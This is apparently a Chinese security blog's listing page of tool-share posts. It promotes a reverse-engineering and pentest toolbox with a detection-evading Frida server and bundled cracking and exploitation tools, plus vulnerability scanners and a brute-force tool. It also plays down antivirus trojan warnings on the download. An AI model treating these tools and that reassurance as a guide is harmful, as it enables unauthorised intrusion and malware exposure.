首页
实用工具
我的旅程
在线壁纸
更多
✒️ 问题反馈
📦 文章统计
🌍 国内镜像
🎬 次元视界
📒 流水账本
🎨 在线 PS
推荐
🕵️ 开源情报
🌆 图片压缩
🍭 资产清洗
💡 我的作品
👤 关于站长
⚔️ 次 元 剑
搜索
1
【工具分享】逆向工具箱 - 次元剑
89,537 阅读
2
【技术分享】PE文件结构分析 ( RVA转FOA )
7,350 阅读
3
【技术分享】NASM x86 Assembly Language
5,982 阅读
4
【技术分享】CK竞技之王游戏辅助制作
3,725 阅读
5
【每日随记】天涯明月刀无限飞修改思路
2,816 阅读
技术分享
CTF解题
英语笔记
数学笔记
网络通信
每日随记
攻防技术
工具分享
Search
标签搜索
Windows
Web安全
Python3
Linux
逆向工程
CTF
红队技术
人工智能
C/C++
黑客工具
Go
密码学
二进制安全
数学
漏洞挖掘
Android
eNSP
渗透测试
蓝队技术
黑客大会
发光的神
累计撰写
160
篇文章
累计收到
103
条评论
首页
栏目
技术分享
CTF解题
英语笔记
数学笔记
网络通信
每日随记
攻防技术
工具分享
页面
实用工具
我的旅程
在线壁纸
✒️ 问题反馈
📦 文章统计
🌍 国内镜像
🎬 次元视界
📒 流水账本
🎨 在线 PS
推荐
🕵️ 开源情报
🌆 图片压缩
🍭 资产清洗
💡 我的作品
👤 关于站长
⚔️ 次 元 剑
搜索到
8
篇与
的结果
2026-07-09
【工具分享】逆向工具箱 - 次元剑
{callout color="#54b5db"}🍭 次元剑 - 最新版本:v1.0.9{/callout}留言B站我改名了从 “ACT忆梦” 换成了 发光的神,我换名字挺快的,基本都会有神字。不敢太高调,“神” 对于我来说还是太遥远了,所以还是为成神而努力发光吧。📖{mtitle title="你好,我是墩墩"/}中二的故事在浩瀚如星空的网络世界里,有一把神剑,它的名字深深印在那些敢于挑战者的心中。“次元剑(MetaSword)”是一把二次元的剑,它的诞生,早已超越了技术的范畴,力量与智慧的象征,是数不清的传奇故事交织而成的。创造者已经消失在历史的长河中,渐渐的被遗忘 。次元剑,它见证了时代的变迁,承载着前人奋斗的足迹,每一代工匠的锤炼,都让它更加锋利。从最初的锻造到今天,它经历了无数次的进化与提升,每一次的蜕变,都是对未来挑战的预演。它的锋利,永远不会随着时间的推移而削弱。随着科技的飞速进步,它会不断蜕变,每一次更新,都是一次力量的觉醒。无论是面对艰难的逆向工程,还是扑朔迷离的渗透测试,次元剑总能以无可匹敌的敏捷,帮助使用者克服所有的困难,打破障碍,突破极限。次元剑真正的力量,不是技术的完美,是来源于使用者的勇气与智慧。只有那些敢于迎接挑战、敢于突破常规的人,才能真正激发出次元剑的无尽潜能。最后让我们一起 “手握次元剑,仗梦走星辰” 吧。我还有句更酷的话:“手握次元剑,踏破九重天”。心中的剑“次元剑” 这个名字听起来可能有些中二,我给它赋予这个名字大部分原因是跟动漫有关,因为天马行空的想法和创意,只有在动漫里会出现,我想让它像动漫一样,拥有无限的可能性。工具箱的动态 Logo 来自于《刀剑神域》(Sword Art Online)。我很喜欢这部动漫作品,第一次看到主角使用星爆气流斩时,这就是男主角,总能给大家带来希望。他的坚定与勇气激励了我。作为主角的他每次总能化险为夷。我觉得,他的强大并不是来自外界,而是他的信念,还有他自己想守护的东西。除了日漫还有国漫,我比较喜欢斗破苍穹三年之约里药老的几句话:“当你紧握双手,里面什么也没有,当你打开双手,世界就在你手中。”“这个世界才没有什么真正的强者,有的只是想要变强的人。”“如果想要真正把剑挥出去,就要把心里的事放下。” “我想,挥剑和专注做事一样,应该就是把心里的顾虑全部放下。” 这么多年过去,初心没变。身边的人来了又走,经历了很多事,但人不能总活在回忆里,就算一个人,也要一直向前走。我还是那个热爱计算机技术的人,喜欢钻技术难题,连我自己都没想到,这件事竟然坚持了这么久。看到这里的你,如果是初学者,请一定要相信,你也可以。幻想爽文 .iframe-wrap-one{ width: 100%; height: 68vh; margin: 10px 0 0; border-radius: 12px; overflow: hidden; box-shadow: 0 8px 24px rgba(0,0,0,.12); } .iframe-wrap-one iframe{ width: 100%; height: 100%; border: 0; } 设计初衷次元剑官网{abtn icon="fa-ravelry" color="#000000" href="https://www.52tt.pro/tools/sword/" radius="" content="次元剑 - 逆流而上 | 点击进入"/} 技术可以垃,但一定要有B格,主要是自己写的有成就感些,工具整合后,查找起来更加方便啦!{abtn icon="fa-book" color="#e10000" href="https://www.52tt.pro/tools/sword/docs/" radius="" content="次元剑 - 使用教程 | 点击进入"/} 次元剑出鞘,这个故事,才刚刚开始。水墨特效 次元剑自带水墨启动特效,默认是开启的。如果你想关闭它,或者调整动画速度,都可以在设置中修改。基本功能{tabs}{tabs-pane label="次元・起源"} .flex-center-one { display: flex; justify-content: center; align-items: center; } .flex-center-one img { width: 550px; height: auto; } 主界面采用动感背景纹理 + 双剑视觉元素,精致且富有冲击力。Logo 灵感源自《刀剑神域》,界面边缘辅以 MetaSword 次元剑专属标识,整体风格鲜明、沉浸感更强。{/tabs-pane}{tabs-pane label="工具分类"} .flex-center-two { display: flex; justify-content: center; align-items: center; } .flex-center-two img { width: 543px; height: auto; } 工具分类采用了我个人偏好的方式设计,主要是为了使用更顺手。当然,也可能存在一些小bug,哈哈哈。模块名称核心工具适用场景Reverse(逆向分析)IDA Pro、x64dbg、Cheat Engine程序反编译、动态调试、内存修改、漏洞挖掘PenTest(渗透测试)Yakit、Tscan信息收集、漏洞扫描、渗透测试、安全评估Language(编程语言)Python、Java、C/C++ 环境脚本编写、代码编译、快速调试Other(杂项工具)文件管理、环境检测、格式转换辅助开发、系统配置、多场景适配Frida IDE(代码编辑器)魔改 Frida-Server动态注入、脚本调试、数据解密{/tabs-pane}{tabs-pane label="右键菜单"} 每个工具都支持右键菜单,可以打开程序存放位置,跟以管理员身份运行。{/tabs-pane}{tabs-pane label="批量删除"} 按住鼠标左键可选中工具批量删除,直接拖动可调整工具位置。{/tabs-pane}{/tabs-pane}{tabs-pane label="基础计算"} 一、基础计算直接输入表达式,Enter 计算,结果自动回填。支持:+ - * / ( ) 与数字、空格示例:1+5→6、(100+200)*3→900二、进制转换(仅支持 2/8/10/16 进制,英文括号)十进制转其他:(数字, 目标进制) 例:(4132,2)→二进制任意互转:(数字, 原进制, 目标进制) 例:(FF,16,10)→255十六进制大小写通用,支持空格三、AI 问答输入问题,按 Ctrl+Enter 提问,回答逐字显示。冷却 2 秒,不可连续提问使用步骤进入工具页 → 激活顶部搜索框计算/进制转换:EnterAI 问答:Ctrl+Enter注意事项必须使用英文括号结果会直接替换输入框内容{/tabs-pane}{tabs-pane label="窗口拉伸"} 主界面支持自由拉伸,窗口大小可根据使用习惯灵活调整(并记录最后一次关闭时的窗口尺寸)。{/tabs-pane}{tabs-pane label="设置面板"} 水墨开场特效可在设置面板开关,支持主题切换、MCP 配置、DeepSeek AI 设置,新增关于软件区域。{/tabs-pane}{tabs-pane label="关于作者"} 点击头像即可跳转到我的博客,头像文字还带有一点故障风的动画效果。{/tabs-pane}{/tabs}次元主题 .iframe-wrap-two{ width: 100%; height: 55vh; overflow: hidden; border-radius: 12px; } .iframe-wrap-two iframe{ width: 100%; height: 100%; border: 0; } Frida 编辑器(过检测版){message type="info" content="本内容仅用于学习与演示,请勿用于任何违法行为。"/}在工具栏中点击顶部导航栏 Frida IDE,即可打开 Frida Hook 代码编辑器。{tabs}{tabs-pane label="次元剑 Frida"} {/tabs-pane}{tabs-pane label="官方 Frida"} {/tabs-pane}{/tabs}次元剑内置魔改版 frida-server,并结合启动注入方式,官方 Frida 注入会被立即干掉,魔改版可无视此类检测。{tabs}{tabs-pane label="启动(Spawn)"} 在 Android 上,提供启动(Spawn)与 附加(Attach)两种注入模式,可选择直接附加正在运行的应用。{/tabs-pane}{tabs-pane label="附加(Attach)"}{/tabs-pane}{tabs-pane label="AI 代码编写"} 在 Windows 上可通过输入 PID 或拖拽程序进行注入,支持已启动和新启动的进程。次元剑内置 FridaIDE 模块专为动态注入与脚本开发而设计,简洁高效,适配多平台与调试场景:✅ 支持主流模拟器:兼容雷电、MuMu 等,无需繁琐配置即可注入运行。✅ Windows 与 Android 双平台调试:一键注入目标进程,快速启动 Hook。✅ 内置脚本补全引擎:涵盖 Java、ObjC、Memory、Module 等 API,辅助高效编写。✅ 集成 DeepSeek R1:AI 帮你生成 Hook 脚本逻辑,轻松上手。✅ 调试输出高亮显示:关键信息一目了然,快速定位调试重点。轻量化集成,功能完整,助你快速完成 Frida 脚本编写与注入。{/tabs-pane}{/tabs}AI 智能体{tabs}{tabs-pane label="DeepSeek-v4-Pro/Flash(支持 Agent)"} .flex-center-three { display: flex; justify-content: center; align-items: center; } .flex-center-three img { width: 100%; height: auto; } 前往 DeepSeek 官网获取 API key → 添加至设置 → 即可开启 AI 智能体功能。操作步骤1.先到 https://platform.deepseek.com/api_keys 进行创建 API key。 2.填入 API key 后点击保存即可使用(无需重启次元剑)。{/tabs-pane}{tabs-pane label="ChatGPT 3.5"} .flex-center-four { display: flex; justify-content: center; align-items: center; } .flex-center-four img { width: 75%; height: auto; } 只是 3.5,不是 4.5? 等我发达先。{/tabs-pane}{tabs-pane label="本地/远程 Ollama"}推荐模型:qwen2.5-coder:14b,参数越大越好(当然你的电脑够给力),小点的模型回复挺憨憨的。操作步骤1.访问 Ollama 官网: https://ollama.com/download,下载并安装 Ollama 程序。2.安装完成 Ollama 后,按下 Ctrl + R,输入 cmd 并回车打开命令提示符窗口,然后运行以下命令:ollama pull qwen2.5-coder:14b模型下载完成后,重启次元剑即可显示本地模型。更多模型可在官网查看:https://ollama.com/search{/tabs-pane}{tabs-pane label="GPT-OSS:120b"}【无图】在线模型,可直接使用。{/tabs-pane}{/tabs}MCP & Trae{tabs}{tabs-pane label="效果展示"}{/tabs-pane}{tabs-pane label="配置教程"}操作步骤1.打开 Trae → 设置 → 选择 MCP,启用手动配置。2.打开次元剑 → 设置 → 点击 MCP 配置复制参数,粘贴到 Trae 并确认即可。{/tabs-pane}{/tabs}开发者工具次元剑基于 Electron 框架开发,本质上可以看作一个浏览器应用,按下 Ctrl + P 即可打开内置的开发者工具。程序源码当然,你们也可以随意修改或添加功能,源码已开源,尽情发挥吧!源码结构 .dircard{background:#fff;border:1px solid #e5e7eb;border-radius:12px;padding:12px 14px;box-shadow:0 4px 16px rgba(0,0,0,.05)} @media (prefers-color-scheme: dark){.dircard{background:#0b0f14;color:#e5e7eb;border-color:#263241}} .codegrid{display:grid;grid-template-columns:auto 1fr;column-gap:16px;row-gap:.1em} .left{white-space:pre;tab-size:2} .right{color:#6b7280;white-space:pre-wrap} .k{color:#4f9e28;} app 🗂️ 核心源码 ├─ Core 🧩 主程序核心:应用逻辑、进程管理、功能调度 │ ├─ MetaSword.js ⚔️ 主入口:应用初始化、模块加载、生命周期 │ └─ MCPFunc.js 🔧 MCP 功能注册与调度中心 ├─ Nexus 🖼️ 主界面框架:UI 渲染 + 用户交互核心 │ ├─ Assets 🎨 公共资源库(全局共用素材) │ │ ├─ Image 🖼️ 公共图片、图标、背景资源 │ │ ├─ Sounds 🎵 音效、提示音资源 │ │ └─ Videos 🎬 动画、启动视频资源 │ ├─ CSS 🎨 全局样式:布局、皮肤、响应式适配 │ ├─ Fonts 🔡 全局字体库 │ │ └─ FontAwesome 🔠 图标字体库 │ │ ├─ css 🎨 FA 样式文件 │ │ ├─ fonts 🔡 字体文件 │ │ ├─ less 🧩 Less 源文件 │ │ └─ scss 🎛️ SCSS 源文件 │ ├─ JS 📜 全局脚本核心 │ │ ├─ AceMain ⚡ Ace 代码编辑器:补全、高亮、调试 │ │ │ └─ snippets ✂️ 代码片段库 │ │ └─ prismjs 🌈 代码语法高亮引擎 │ │ ├─ components 🧩 高亮组件 │ │ └─ themes 🎨 高亮主题 │ └─ Views 🖥️ 主界面模板:页面结构、弹窗、布局 │ └─ config ⚙️ 界面配置:视图参数、布局预设 ├─ Plugins 🔌 插件扩展 │ ├─ claude 🤖 Claude Code 集成 │ │ ├─ .claude ⚙️ Claude 配置中心 │ │ │ ├─ projects 📁 项目上下文记忆库 │ │ │ ├─ sessions 📝 会话记录与历史 │ │ │ └─ skills 🧰 安全审计技能包(PHP/.NET/CTF) │ │ ├─ AppData 💾 应用数据持久化 │ │ └─ Cache 🚀 本地缓存 │ ├─ CLI 🛠️ 命令行工具集(内嵌运行环境) │ │ ├─ apktool 📦 Android APK 反编译/重打包 │ │ ├─ arp-scan 🌐 ARP 网络扫描与发现 │ │ ├─ curl 🍭 HTTP/网络请求调试 │ │ ├─ dnSpy 🧬 .NET 反编译/调试/修改 │ │ ├─ exiftool 📷 文件元数据读写/取证 │ │ ├─ frida-tools ⚡ Frida 动态插桩工具链 │ │ ├─ fuff 🕷️ Web 目录/文件模糊测试 │ │ ├─ hashcat 🔐 GPU 哈希破解引擎 │ │ ├─ masscan ⚡ 超高速端口扫描器 │ │ ├─ radare2 🏴 反汇编/二进制分析框架 │ │ ├─ sqlmap 💉 SQL 注入自动化检测与利用 │ │ ├─ strings 🔎 二进制字符串提取 │ │ ├─ tshark 🦈 网络协议分析(Wireshark CLI) │ │ ├─ upx 📦 可执行文件加壳/脱壳 │ │ ├─ volatility3 🧠 内存取证分析框架 │ │ ├─ wafw00f 🛡️ Web 应用防火墙识别 │ │ └─ ysoserial 💥 Java 反序列化漏洞利用 │ └─ frida 🧩 Frida 动态插桩插件 │ ├─ Exten ⚙️ 运行依赖(Frida 运行时库) │ └─ Script 📝 Hook 脚本仓库 └─ Theme 🎨 多主题皮肤中心 ├─ Cover 🖼️ 主题封面资源 ├─ Fate 🕑 命运主题 ├─ Origin 🐳 起源主题 ├─ Reimu 🏳️🌈 灵梦主题 ├─ Ziya 🟣 紫雅 · 源主题 └─ Ziya Grey ⚪ 紫雅 · 灰主题 ├─ Assets 🎨 主题专属资源 │ └─ Image 🖼️ 主题图片、角色立绘 ├─ CSS 🎨 主题样式 └─ Views 🖥️ 界面布局 项目开源项目已上传至 GitHub,可直接替换次元剑 app 文件夹,即可完成版本更新。感兴趣的朋友欢迎点个 Star,我将持续更新视频教程与次元剑功能。若你有好的建议,随时可以联系我哦~ .toast-container { position: fixed; top: 130px; left: 50%; transform: translateX(-50%); z-index: 9999; max-width: 520px; width: 100%; } .toast { background-color: #0f141e; color: #e6edf7; padding: 14px 20px; margin-bottom: 16px; border-radius: 10px; border: 1px solid #272f3f; display: flex; justify-content: space-between; align-items: center; box-shadow: 0 0 16px rgba(139, 92, 246, 0.18); opacity: 0; transform: translateY(-40px) scale(0.96); transition: opacity 0.4s ease, transform 0.4s cubic-bezier(0.2, 0, 0.2, 1); font-size: 14px; } .toast.show { opacity: 1; transform: translateY(0) scale(1); } .toast .close-btn { background: none; border: none; color: #7c8798; font-size: 20px; cursor: pointer; padding: 2px 6px; margin-left: 16px; border-radius: 6px; transition: all 0.25s ease; } .toast .close-btn:hover { transform: scale(1.15); color: #ff5656; background: rgba(255, 86, 86, 0.1); } .toast .message { font-size: 15px; line-height: 1.6; flex-grow: 1; } .highlight-green { color: #22c55e; text-shadow: 0 0 6px rgba(34, 197, 94, 0.35); font-weight: 600; } .highlight-purple { color: #a78bfa; text-shadow: 0 0 8px rgba(139, 92, 246, 0.4); font-weight: 600; } function showToast(message, duration = 5000) { const toastContainer = document.getElementById('toastContainer'); const toast = document.createElement('div'); toast.classList.add('toast'); const messageElement = document.createElement('span'); messageElement.classList.add('message'); messageElement.innerHTML = message; toast.appendChild(messageElement); const closeButton = document.createElement('button'); closeButton.textContent = '×'; closeButton.classList.add('close-btn'); closeButton.onclick = () => { toast.classList.remove('show'); setTimeout(() => toast.remove(), 500); }; toast.appendChild(closeButton); toastContainer.appendChild(toast); setTimeout(() => toast.classList.add('show'), 80); setTimeout(() => { toast.classList.remove('show'); setTimeout(() => toast.remove(), 400); }, duration); } showToast("⚡ 史诗级 AI 版本更新公告,次元剑 v1.0.9 已正式上线,受外部条件限制,当前 AI 智能体暂时使用 Claude Code 驱动,自研引擎将在 v1.1.0 Beta 版本更新上线。", 10000); 版本更新{collapse}{collapse-item label="📜 历史记录" close}{timeline}{timeline-item color="#19be6b"}{card-describe title="2023-8-31"}📦 更新内容:版本:1.0.0 🛠️【技术】基于 Node.js、HTML/CSS、JS、Electron 构建🚀【新增】初代固定布局,包含主页、工具、ChatGPT、关于四大模块🚀【新增】复古圆角按钮,打造独特UI风格💪【优化】初步优化代码逻辑,项目持续迭代工具数量:62 {/card-describe}{/timeline-item}{timeline-item color="#19be6b"}{card-describe title="2024-6-16"}📦 更新内容:版本:1.0.1 🚀【新增】全新固定式UI布局,圆角按钮更简约现代🚀【新增】支持外部工具自定义,采用ToolsList.xml管理🚀【新增】优化双剑动画,界面更流畅美观🚀【新增】新增逆向与渗透常用工具,拓展实用性💪【优化】重构代码逻辑,提升稳定性与可维护性工具数量:85 {/card-describe}{/timeline-item}{timeline-item color="#19be6b"}{card-describe title="2024-7-15"}📦 更新内容:版本:1.0.2 🚀【新增】集成Frida IDE,支持独立编辑窗口,优化调试体验🚀【新增】自定义工具管理,通过ToolsList.xml灵活配置🚀【新增】水墨风Logo动画,提升开场视觉感工具数量:98 {/card-describe}{/timeline-item}{timeline-item color="#19be6b"}{card-describe title="2024-11-10"}📦 更新内容:版本:1.0.3-stable 🚀【新增】F1 快捷键快速隐藏/显示窗口🚀【新增】可关水墨开场动画,配置存入 ToolsList.xml🚀【新增】集成 Java、Python 脚本,支持一键 .bat 启动💪【优化】美化 Frida IDE 界面,支持拖拽代码注入💪【优化】兼容绝对路径配置,提升 ToolsList.xml 可用性🐞【修复】修复 Frida 权限不足,精简冗余逻辑🚀【新增】Frida IDE 快捷键:快捷键功能说明CTRL + +代码字体放大CTRL + -代码字体缩小CTRL + ALT + F代码缩进CTRL + /代码注释CTRL + F快速搜索工具数量:98 {/card-describe}{/timeline-item}{timeline-item color="#19be6b"}{card-describe title="2024-11-23"}📦 更新内容:版本:1.0.4 🚀【新增】新增逆向分析与渗透测试工具,功能更全面🚀【新增】新增设置面板,支持动画、主题、版本更新💪【优化】优化UI与视觉效果,精简代码💪【优化】移除启动动画XML配置,提升启动稳定性🐞【修复】修复Frida注入报错0x00000057问题🚀【新增】Frida IDE快捷键增强:快捷键功能说明CTRL + +代码字体放大CTRL + -代码字体缩小CTRL + ALT + F代码缩进CTRL + /代码注释CTRL + F快速搜索CTRL + H快速替换CTRL + L代码定位CTRL + D按行删除CTRL + ,设置面板ALT + E代码自检工具数量:100 {/card-describe}{/timeline-item}{timeline-item color="#19be6b"}{card-describe title="2025-3-31"}📦 更新内容:版本:1.0.5 🚀【新增】清理无效工具,替换为实用工具🚀【新增】工具右键支持打开程序位置🚀【新增】CheckTools 模块,校验工具完整性🚀【新增】集成运行环境,工具即点即用💪【优化】优化 UI 与性能,精简冗余逻辑🐞【修复】修复拖拽异常,增强 UAC 权限兼容工具数量:99 {/card-describe}{/timeline-item}{timeline-item color="#19be6b"}{card-describe title="2025-8-5"}📦 更新内容:版本:1.0.6 Beta 🚀【新增】全面重构代码,统一目录规范,提升稳定性🚀【新增】精简无用工具,新增实用常用工具🚀【新增】右键菜单:打开位置、管理员运行🚀【新增】集成 DeepSeek R1 AI,智能生成 Frida Hook 代码🚀【新增】支持窗口拉伸,适配多分辨率💪【优化】优化UI细节,界面更清爽统一💪【优化】清理冗余代码,程序更轻巧流畅🐞【修复】修复已知Bug,提升兼容与稳定性🐞【修复】优化UAC提权逻辑,适配更多环境🐞【修复】修复部分工具拖拽异常工具数量:100+{/card-describe}{/timeline-item}{timeline-item color="#19be6b"}{card-describe title="2026-1-7"}📦 更新内容:版本:1.0.7🚀【新增】次元剑动漫风格Logo主题,适配启动/主界面视觉💪【优化】清理冗余代码依赖,程序轻量化,运行更流畅💪【优化】精简工具库,保留常用工具,提升查找调用效率🐞【修复】修复已知问题,优化整体使用体验工具数量:100+{/card-describe}{/timeline-item}{timeline-item color="#19be6b"}{card-describe title="2026-04-1"}📦 更新内容:版本:1.0.8🚀【新增】支持 MCP 协议,联动 Trae 实现 AI 上下文交互🚀【新增】右键增删工具、长按批量删除、主题切换🚀【新增】支持添加工具,并在工具箱内自由拖拽摆放🚀【新增】输入框 Ctrl+Enter 快捷提问 AI、随机一言🚀【新增】工具箱启动提示更新,支持在线升级版本💪【优化】Frida IDE 代码高亮与提示性能💪【优化】重构代码,优化 UI 展示工具数量:100+{/card-describe}{/timeline-item}{timeline-item color="#ff0000"}{card-describe title="2026-06-28"}📦 更新内容:版本:1.0.9🚀【新增】AI 智能体,暂时集成 Claude Code + DeepSeek V4 Pro/Flash🚀【新增】终端工具栏,Skills 安装、提示词、MCP 面板、安全模式🚀【新增】CTF 全栈 skills(Web/PWN/Reverse 等 8 大类)+ 自动 Writeup🚀【新增】.NET + PHP 代码审计管线,30+ 审计 skill🚀【新增】内置 16 个 CLI 安全工具,AI 自动感知并优先调用🚀【新增】MCP 多语言运行时:Python / Java / C 在线编译执行🚀【新增】Agent 侧边面板,实时日志 + 权限弹窗 + 调用追踪💪【优化】精简 MCP 工具,移除冗余 I/O 接口,统一 CLI 直调💪【优化】重构主进程架构,统一无边框透明窗口体系💪【优化】5 套主题一键切换(起源/命运/紫雅/灵梦)💪【优化】启动动画可配置,全局快捷键,版本自动检测更新工具数量:100{/card-describe}{/timeline-item}{/timeline}{/collapse-item}{/collapse}工具下载{tabs}{tabs-pane label="工具下载"} .meta-container { max-width: 780px; margin: 30px auto; padding: 40px 30px; background-color: #fff; border: 1px solid #e5e7eb; border-radius: 18px; box-shadow: 0 6px 20px rgba(0, 0, 0, 0.05); font-family: 'Inter', 'Segoe UI', sans-serif; } .meta-header { display: flex; justify-content: center; margin-bottom: 18px; } .meta-logo-group { display: flex; align-items: center; } .meta-logo { height: 56px; margin-right: 12px; } .meta-title-group { display: flex; flex-direction: column; justify-content: center; } .meta-title { font-size: 24px; font-weight: 700; color: #111; letter-spacing: 3px; line-height: 1; margin-left: 30px; } .meta-subtitle { font-size: 14px; color: #888; line-height: 1.4; margin-top: 3px; } .meta-warning { text-align: center; font-size: 15px; color: #555; margin-bottom: 35px; } .link-list { display: flex; flex-direction: column; gap: 14px; } .link-block { display: flex; align-items: center; padding: 14px 20px; border-radius: 12px; background-color: #f3f4f6; text-decoration: none; color: #111; font-weight: 500; transition: background-color 0.2s ease; } .link-block:hover { background-color: #e5e7eb; } .link-icon { width: 20px; height: 20px; margin-right: 12px; flex-shrink: 0; } .link-code { background: #eee; padding: 2px 6px; border-radius: 4px; } 次 元 剑 MetaSword Toolbox v1.0.9 个别工具可能被安全软件误报,不放心可在虚拟机中使用。 【百度网盘】次元剑完整版|版本 1.0.9(2026.6.28)|提取码: 2085 【115网盘】次元剑完整版|版本 1.0.9(2026.6.28)|提取码: z075 【夸克网盘】次元剑完整版|版本 1.0.9(2026.6.28)|提取码: 无 【GitHub】MetaSword 源码仓库|仅包含基础源码,不包含工具 {message type="info" content="请确保次元剑安装路径不含中文字符,避免一些工具无法使用。"/}错误示例:D:\VoxShadow\次元剑\MetaSword 正确示例:D:\VoxShadow\MetaSword{/tabs-pane}{tabs-pane label="报毒说明"}可疑类型:后门、黑客工具、代码混淆器、木马、漏洞攻击、下载者、间谍、勒索。已完成威胁处置,当前仅剩 101 个低风险可疑文件,初步判断不影响电脑正常使用。{/tabs-pane}{/tabs}工具箱有任何建议或问题,可在 GitHub 提交 Issue,欢迎 Star 支持。定期更新次元剑内工具使用技巧,更多内容请关注:B站 | 抖音 账号。视频中用到的部分Hook代码,仅供参考:Frida Hook篇友情赞助 .donate-modern { max-width: 720px; margin: 0px auto; border-radius: 20px; background-color: #fff; text-align: center; } .donate-modern h2 { font-size: 22px; font-weight: 600; color: #111; margin-bottom: 8px; } .donate-modern p { font-size: 14px; color: #666; } .donate-qrcodes { display: flex; justify-content: center; gap: 40px; flex-wrap: wrap; } .donate-card { width: 200px; border-radius: 16px; padding: 16px; transition: all 0.2s ease; } .donate-card img { width: 100%; border-radius: 12px; margin-bottom: 10px; border: 1px solid #eee; } .donate-card span { font-size: 14px; color: #333; font-weight: 500; } 如果你觉得这个项目还不错,欢迎扫码支持一下 ❤️ 开源不易,维护更难!如果次元剑对你有帮助,欢迎给点小小的支持~ 💖你的认可和鼓励,就是我持续优化更新的动力!感谢陪伴,一起成长!✨免责声明本工具箱仅供学习与研究使用,旨在帮助用户提升技术能力,请勿将其用于非法用途,否则产生后果由使用者自行承担,作者不对任何滥用行为负责,敬请理性使用,遵守法律法规。2026-6-27 20:20 星期六 更新过
2026年07月09日
89,537 阅读
68 评论
4,563 点赞
2025-05-20
【工具分享】Katana + EZ 自动化漏洞打点
今日分享Katana 是由 ProjectDiscovery 团队开发的开源命令行 Web 爬虫工具,采用 Go 语言编写,具备高性能、强定制、易集成等特点,专为安全研究、渗透测试与自动化平台设计。它支持静态链接抓取和 JavaScript 动态内容解析,可深入单页应用(SPA)提取隐藏接口、动态 URL 与表单字段,同时具备字段提取、代理支持、多模式运行(标准/无头浏览器)等能力。Katana 输出格式友好,支持 JSON 与标准流,便于与 nuclei、httpx、ez 等工具联动,构建自动化漏洞打点流程。工具联动我比较推荐这种组合方式:Katana + ez,先通过 Katana 获取爬虫数据,再交由 ez 去验证漏洞,整体流程更全面也更自动化。推荐理由: Katana:快速、高效,支持 JS 解析和字段提取,能发现隐藏路径、API 接口。ez:专注于漏洞验证,适合对爬取结果做进一步测试与利用。ez webscan先启动 ez 的被动扫描。Katana -list urls.txt -proxy http://127.0.0.1:2222利用 Katana 爬取出的数据代理转发给 ez 进行漏洞扫描。工具下载 .link-block { display: flex; align-items: center; justify-content: center; padding: 14px 20px; border-radius: 12px; background-color: #f3f4f6; text-decoration: none; color: #111; font-weight: 500; cursor: pointer; transition: background 0.2s ease; } .link-block:hover { background-color: #e0e0e0; } .link-block svg { width: 20px; height: 20px; fill: currentColor; margin-right: 12px; } 🕷️ Katana 爬虫引擎 由 ProjectDiscovery 团队打造的命令行 Web 爬虫工具,支持 JS 渲染、动态内容识别与字段提取,适用于漏洞挖掘与自动化信息收集。 立即前往 GitHub 下载 Katana
2025年05月20日
745 阅读
0 评论
56 点赞
2025-05-19
【工具分享】EZ 工具 主动+被动一站搞定
今日分享 EZ 是由 M-SEC 社区开发的一款跨平台漏洞扫描器,专为渗透测试和安全评估设计。它集成了信息收集、端口扫描、服务爆破、URL 爬虫、指纹识别和被动扫描等多种功能,能够帮助安全专家发现常见的网络漏洞。核心功能信息收集与指纹识别:识别目标系统的操作系统、服务和应用程序等信息。端口扫描与服务爆破:检测开放端口并尝试破解常见服务的认证。URL 爬虫与被动扫描:自动爬取网站链接,进行漏洞检测。漏洞检测:支持检测 SQL 注入、XSS、XXE、SSRF 等常见漏洞。内置 POC 支持:集成了 Apache Shiro、RabbitMQ、Struts2 等组件的漏洞检测。Web 界面操作:提供图形化界面,方便用户进行任务管理和结果查看。使用方法下载与安装:从 GitHub 或 M-SEC 社区获取 EZ 工具的二进制文件。证书申请:注册 M-SEC 社区账号,并在个人中心申请证书(有效期为一个月)。启动工具:将证书放置于 EZ 工具目录下,使用命令行启动,如:ez webscan -u http://example.comWeb 界面:通过命令 ez web 启动 Web 界面,进行可视化操作。被动扫描:监听本地代理流量进行被动扫描,命令如下:ez webscan工具下载 .link-block { display: flex; align-items: center; justify-content: center; padding: 14px 20px; border-radius: 12px; background-color: #f3f4f6; text-decoration: none; color: #111; font-weight: 500; cursor: pointer; transition: background 0.2s ease; } .link-block:hover { background-color: #e0e0e0; } .link-block svg { width: 20px; height: 20px; fill: currentColor; margin-right: 12px; } 🚀 EZ 漏洞扫描器 多功能漏洞扫描器,支持信息收集、端口扫描、服务爆破、URL 爬虫与指纹识别,适用于渗透测试与红队评估。 立即前往 GitHub 下载 EZ
2025年05月19日
524 阅读
0 评论
47 点赞
2025-05-18
【工具分享】密探工具,渗透起手第一步
今日分享密探是一款面向红队实战与SRC挖掘场景的多功能渗透测试工具,整合了信息收集、资产测绘、漏洞探测、弱口令破解、接口抓取等核心功能,旨在帮助网络安全学习者和从业者快速上手实战渗透流程。核心亮点全流程覆盖:集成信息收集、资产测绘、目录扫描、接口探测、弱口令爆破等模块,覆盖红队与SRC实战关键环节。多引擎资产测绘:支持 FOFA、Hunter、Quake、ZoomEye、零零信安等平台的数据查询、聚合导出与联动扫描。子域名递归爆破:具备高效的子域名爆破能力,支持多级递归与 title/title\_hash 获取,并内置聚合查询接口。文件与备份扫描:支持通配目录扫描、自定义字典、备份文件识别、Spring 漏洞路径等常见弱点探测。指纹识别联动:自动识别网站指纹,并可联动敏感信息、接口、路径模块,辅助精准定位攻击面。弱口令批量检测:内置多种服务协议(MySQL、Redis、SSH、Socks5等)弱口令爆破功能,支持测绘数据联动爆破。敏感接口探测:整合 Swagger 接口抓取与未授权调用检测,自动识别高危 HTTP 方法与 API 返回数据。工具箱辅助功能:包含 JWT 爆破、SessionKey 加解密、社工字典生成器、搜索语法生成器等实用渗透辅助工具。渗透备忘录体系:集成 Markdown 编辑器,支持自定义知识路线与模块目录,适合记录实战经验与技巧笔记。可视化交互体验:提供统一皮肤、历史记录缓存、右键操作、状态高亮等丰富 UI 细节,提升渗透测试操作流畅度。子域挖掘资产测绘批量权重网站导航常见问题JavaFX 报错:Java 11 及以上版本需手动下载 JavaFX SDK 并配置模块路径,建议优先使用 JDK 8。界面乱码问题:运行程序时添加 -Dfile.encoding=UTF-8 启动参数,可避免中文乱码。ZoomEye 查询失败:普通账户每日查询额度有限,建议关注官方公众号获取积分或升级为高级会员。程序无法启动或闪退:请确认本地环境为 JDK 8,优先使用 GitHub 官方版本运行,避免第三方打包问题。工具下载 .link-block { display: flex; align-items: center; justify-content: center; padding: 14px 20px; border-radius: 12px; background-color: #f3f4f6; text-decoration: none; color: #111; font-weight: 500; cursor: pointer; transition: background 0.2s 